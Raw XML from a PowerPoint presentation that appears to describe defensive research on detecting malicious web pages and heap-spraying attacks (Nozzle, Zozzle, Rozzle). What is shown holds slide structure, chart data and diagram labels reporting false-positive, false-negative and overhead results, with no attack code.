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42"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="367" r:id="rId3"/>
    <p:sldId id="372" r:id="rId4"/>
    <p:sldId id="366" r:id="rId5"/>
    <p:sldId id="369" r:id="rId6"/>
    <p:sldId id="370" r:id="rId7"/>
    <p:sldId id="371" r:id="rId8"/>
    <p:sldId id="396" r:id="rId9"/>
    <p:sldId id="311" r:id="rId10"/>
    <p:sldId id="364" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="377" r:id="rId13"/>
    <p:sldId id="378" r:id="rId14"/>
    <p:sldId id="379" r:id="rId15"/>
    <p:sldId id="398" r:id="rId16"/>
    <p:sldId id="397" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="374" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="399" r:id="rId21"/>
    <p:sldId id="375" r:id="rId22"/>
    <p:sldId id="354" r:id="rId23"/>
    <p:sldId id="352" r:id="rId24"/>
    <p:sldId id="355" r:id="rId25"/>
    <p:sldId id="357" r:id="rId26"/>
    <p:sldId id="334" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="359" r:id="rId29"/>
    <p:sldId id="400" r:id="rId30"/>
    <p:sldId id="360" r:id="rId31"/>
    <p:sldId id="361" r:id="rId32"/>
    <p:sldId id="380" r:id="rId33"/>
    <p:sldId id="381" r:id="rId34"/>
    <p:sldId id="382" r:id="rId35"/>
    <p:sldId id="383" r:id="rId36"/>
    <p:sldId id="384" r:id="rId37"/>
    <p:sldId id="388" r:id="rId38"/>
    <p:sldId id="389" r:id="rId39"/>
    <p:sldId id="390" r:id="rId40"/>
    <p:sldId id="39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BCAC47-CF05-43AB-B3BF-D53E2B98C546}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="367"/>
            <p14:sldId id="372"/>
            <p14:sldId id="366"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="371"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Exploits" id="{4E40C6DE-0E34-4B5A-B825-6522DA8DE54F}">
          <p14:sldIdLst>
            <p14:sldId id="396"/>
            <p14:sldId id="311"/>
            <p14:sldId id="364"/>
            <p14:sldId id="309"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Nozzle" id="{921E2541-0D48-471D-B0D5-62B1206AD6BC}">
          <p14:sldIdLst>
            <p14:sldId id="398"/>
            <p14:sldId id="397"/>
            <p14:sldId id="289"/>
            <p14:sldId id="374"/>
            <p14:sldId id="271"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Zozzle" id="{2FA832C0-9A48-4926-9996-687FD6A18F3B}">
          <p14:sldIdLst>
            <p14:sldId id="399"/>
            <p14:sldId id="375"/>
            <p14:sldId id="354"/>
            <p14:sldId id="352"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
            <p14:sldId id="334"/>
            <p14:sldId id="336"/>
            <p14:sldId id="359"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Rozzle" id="{C8C52163-945A-4D9C-A933-4300927160DA}">
          <p14:sldIdLst>
            <p14:sldId id="400"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="380"/>
            <p14:sldId id="381"/>
            <p14:sldId id="382"/>
            <p14:sldId id="383"/>
            <p14:sldId id="384"/>
            <p14:sldId id="388"/>
            <p14:sldId id="389"/>
            <p14:sldId id="390"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusions" id="{1B08A128-B548-4DA2-901B-54E1FC1ED8E6}">
          <p14:sldIdLst>
            <p14:sldId id="394"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Backup" id="{BB95C734-D164-46DB-8FA4-3023A3FA6124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66FF"/>
    <a:srgbClr val="FFFF99"/>
    <a:srgbClr val="FF669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771" autoAdjust="0"/>
    <p:restoredTop sz="99475" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="-840" y="-3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v\RozzleSD\rozzle\Presentation\zozzle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cat>
            <c:numRef>
              <c:f>foo!$B$2:$B$30</c:f>
              <c:numCache>
                <c:formatCode>m/d/yyyy</c:formatCode>
                <c:ptCount val="29"/>
                <c:pt idx="0">
                  <c:v>40695</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>40696</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40697</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>40698</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>40699</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>40700</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>40701</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>40702</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>40703</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>40704</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>40705</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>40706</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>40707</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>40708</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>40709</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>40710</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>40711</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>40712</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>40713</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>40714</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>40715</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>40716</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>40717</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>40718</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>40719</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>40720</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>40721</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>40722</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>40723</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>foo!$A$2:$A$30</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="29"/>
                <c:pt idx="0">
                  <c:v>5276</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4801</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4747</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4833</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5298</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>4486</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>3121</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>6429</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5548</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5164</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5578</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4927</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>5295</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>352</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>5604</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>8639</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>8611</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>6612</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6025</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>6390</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>6177</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>5683</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6095</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6098</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>6061</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>6428</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>6326</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>6261</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3078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16384"/>
        <c:axId val="47617920"/>
      </c:barChart>
      <c:dateAx>
        <c:axId val="4761638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47617920"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblOffset val="100"/>
        <c:baseTimeUnit val="days"/>
      </c:dateAx>
      <c:valAx>
        <c:axId val="47617920"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1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476163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pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
            <a:t>Blacklist</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t> malicious ones</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
            <a:t>Approach</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>Crawl pages</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
            <a:t>Goal</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t>: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>Protect users from evil pages</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0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ScaleY="8597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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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/>
      <dgm:spPr/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9D31E43E-0C75-44D3-BF93-B8B7D4F7A5B5}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{DF9DA809-A70B-49D0-9BD2-B719A25BC9DD}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{79B2CDB0-5881-494B-9259-40FC09720A41}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A2BA7C5A-3A16-4382-9F73-A7E06BCD3C38}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{0A37AAFF-A34F-404F-BE94-CC4B9E3AFA50}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624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8A0638D3-607E-423D-9640-E02112141176}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{01009446-2FD8-42EA-B511-CD3FD5AD2B3B}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A2039A87-0C29-45D1-BFAE-FBC77DE15FBD}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{16A05311-9416-487B-99F0-EC863C7A913A}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{4886C4CF-6912-42D0-B1EE-3F4975ABEDE4}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{89B6DBAB-B9A1-436E-A399-BB0E5458B159}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{83AC4D68-E2E8-4B5E-AE2B-511D942AD60A}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{0711EF31-E77D-4020-8A59-1408F0CD8141}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{E8BDE60C-24D3-4BFE-BC55-7FAAFB2DB39B}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{541EB01A-BAE6-4515-868D-1C2152907273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4000" b="1" dirty="0" smtClean="0"/>
            <a:t>            </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="6000" b="1" dirty="0" smtClean="0"/>
            <a:t>Nozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4800" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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 custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="40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Zozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="40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r>
            <a:rPr lang="en-US" sz="40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Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="40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 custScaleX="140857" custScaleY="140857"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Child1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="236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 custScaleX="62261" custScaleY="62261"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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 custScaleX="62261" custScaleY="62261"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>
        </a:solidFill>
      </dgm:spPr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AFA0C8-E905-4444-9DA1-F4A50F5C7416}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{25996E4F-F1DD-40D8-86FB-910B64FA6EDA}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{C62AE6B3-96E0-4D9C-B14D-093E8FFA29BE}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList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0144958D-1134-49F1-BCBE-9D9A43CCA1BC}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{51A994A4-7B0E-42D9-A94F-5309B5AC2784}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025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7A0C9483-8000-4B2D-96B5-06406DA005E1}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A0CEDB1B-C131-453E-B74E-18E52EF84F2F}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{C70DD9B0-94B1-4EC5-8D39-693A0A664DB8}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{3FFC44B3-5D26-454B-8DE2-ACFD27F42941}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{03734E0B-3BD9-45C6-B876-462BA1C4C7EC}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{E36DE844-77A3-4581-9C81-9F0F2607BE21}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{BDC35AFA-B67A-4FC6-8F05-AB1A3B08549B}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{6C5B5B20-B555-436B-99C5-6E9E107FF118}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{2A0C3746-E6D5-4093-AD9E-C637300B8D58}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{8F2C9882-6C81-4945-96F2-2F25933C6758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56226F-41F8-4C7F-9438-1530F832FC6B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#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11AFB3E-E495-4E70-964A-A0FF7D3E9244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 0 False Positives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC5B9E11-4B1E-490A-ADA4-504825673E7D}" type="parTrans" cxnId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}" type="sibTrans" cxnId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D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150 top Web sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{782B4437-07A0-4E5A-85C7-3FF83CC4E84E}" type="parTrans" cxnId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E01572F0-8222-4FB7-9B54-517D0F0F4B27}" type="sibTrans" cxnId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7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 0 False Negatives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A767E8E-0D70-4D86-8E25-6514472640C4}" type="parTrans" cxnId="{9816829D-4939-494B-8F89-A1C3F157C491}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}" type="sibTrans" cxnId="{9816829D-4939-494B-8F89-A1C3F157C491}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D11AD2A-5602-4199-8990-A60E96D171E1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12 published heap spraying exploits and</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DFA58F4-89F8-46BA-BB88-CEC3495411EA}" type="parTrans" cxnId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3868F040-BEA2-4A7A-908D-8F7D3FE23CBF}" type="sibTrans" cxnId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1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 Runtime Overhead</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72EF87C9-BEC4-4AC0-9FFD-727D2930318D}" type="parTrans" cxnId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F621A551-C7AC-44B7-A205-322EF7C41F94}" type="sibTrans" cxnId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F2F1122-473D-46C8-B826-D0BDFADD288B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As high as 2x without sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A44EAEB2-4EB8-4D05-B0C6-8D7BC5798E5B}" type="parTrans" cxnId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4395D986-6C88-408D-BCB6-3F6BE3F6D187}" type="sibTrans" cxnId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441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5-10% with sampling</a:t>
